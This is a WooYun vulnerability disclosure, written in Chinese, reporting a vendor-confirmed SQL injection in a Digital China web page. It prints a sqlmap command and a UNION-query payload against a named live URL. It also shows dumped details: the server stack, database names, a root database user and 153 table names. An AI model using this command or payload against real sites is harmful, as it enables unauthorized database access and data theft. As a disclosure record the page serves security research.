当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146999

漏洞标题:神州数码某站SQL注入(153个表)

相关厂商:digitalchina.com

漏洞作者: 路人甲

提交时间:2015-10-15 17:07

修复时间:2015-11-30 09:28

公开时间:2015-11-30 09:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

神州行,我看行.

详细说明:

sqlmap.py -u "http://www.ciscostation.com.cn:80/storiesview.j
sp?ID=33%20AND%203*2*1%3d6%20AND%20533%3d533"


1.jpg


2.jpg


3.jpg


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (36) - 10 columns
Payload: http://www.ciscostation.com.cn:80/storiesview.jsp?ID=-6355 UNION ALL SELECT 36,CONCAT(0x71626a7a71,0x5279576b697049427953,0x717a717171),36,36,36,36,36,36,36,36#21=6 AND 533=533
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: MySQL 5
available databases [6]:
[*] cisstation
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] webhost


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (36) - 10 columns
Payload: http://www.ciscostation.com.cn:80/storiesview.jsp?ID=-6355 UNION ALL SELECT 36,CONCAT(0x71626a7a71,0x5279576b697049427953,0x717a717171),36,36,36,36,36,36,36,36#21=6 AND 533=533
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: MySQL 5
current user: 'root@localhost'


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (36) - 10 columns
Payload: http://www.ciscostation.com.cn:80/storiesview.jsp?ID=-6355 UNION ALL SELECT 36,CONCAT(0x71626a7a71,0x5279576b697049427953,0x717a717171),36,36,36,36,36,36,36,36#21=6 AND 533=533
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: MySQL 5
Database: cisstation
[153 tables]
+----------------------+
| 201107dc |
| 2011gcs |
| 2011smhy |
| 2012cxhy |
| 2015gcs |
| path |
| admin |
| adminsns |
| album |
| application |
| applypoly |
| auctioncp |
| auctionjl |
| auctionyh |
| bbsadmin |
| bbsbankuai |
| bbsbanzhu |
| bbsdengji |
| bbsdx |
| bbshuiyuan |
| bbspattern |
| bbstiezi |
| bbstoupiao |
| bbsvote |
| cases |
| cdesadmin |
| cdesbaobei |
| cdesdati |
| cdesjiangpin |
| cdesjifen |
| cdesman |
| cdesqudao |
| cdesquyu |
| cdesrenzheng |
| cdesxiangxi |
| class1 |
| class2 |
| class3 |
| classname |
| clickdemo |
| cnet |
| commissioner |
| company |
| departmentnum |
| diaocha201301 |
| ecommadmin |
| equiptmentnum |
| examine |
| friends |
| ftpdown |
| golfship |
| history |
| hortation |
| huiyimemgroup |
| hyjltable |
| hyup |
| indexsum |
| jfjhdy |
| jingdcp |
| jjadmin |
| jjlist |
| jjyear |
| list |
| listuc |
| log_pic |
| log_say |
| logo_member |
| miaosha |
| moneycart |
| moneycp |
| moneyimg |
| moneyjl |
| nacs2013 |
| nacs_txds |
| notes |
| onapply |
| optional |
| packtable |
| participants |
| personnum |
| pinglun |
| ploy |
| pxsheng |
| qianbo_about |
| qianbo_down |
| qianbo_hotp |
| qianbo_incentives |
| qianbo_incentivesort |
| qianbo_jikans |
| qianbo_jikansort |
| qianbo_lanmusort |
| qianbo_memgroup |
| qianbo_monetary |
| qianbo_monetarysort |
| qianbo_news |
| qianbo_newssort |
| qianbo_products |
| qianbo_productsort |
| qianbo_solutions |
| qianbo_solutionsort |
| qianbo_stories |
| qianbo_webfoot |
| research |
| response |
| scorelog |
| sharing |
| showding |
| sm_shijuan |
| sm_shijuancj |
| sm_shijuangr |
| sm_txdg |
| sm_txds |
| sm_txpg |
| sm_txps |
| sm_txtg |
| sm_txts |
| sm_wdgd |
| smart |
| smb |
| smbapp |
| smberpjf |
| smbinfo |
| smbjfnote |
| subadmin |
| subscription |
| threeid |
| title |
| tptitle |
| ucadmin |
| ucass |
| uclist |
| ucsapplication |
| ucshortation |
| ucsscorelog |
| ucssn |
| ucssnlspy |
| vbconcern |
| vbtiezi |
| vipinfo |
| viporder |
| viporders |
| visiting |
| visitor |
| votes |
| votesname |
| votespolls |
| yinhebaobei |
| yinhedemo |
| yinhejddh |
| yinhelog |
| yinhename |
| yinheshou |
| zymail |
+----------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-16 09:27

厂商回复:

尽快处理,谢谢!

最新状态:

暂无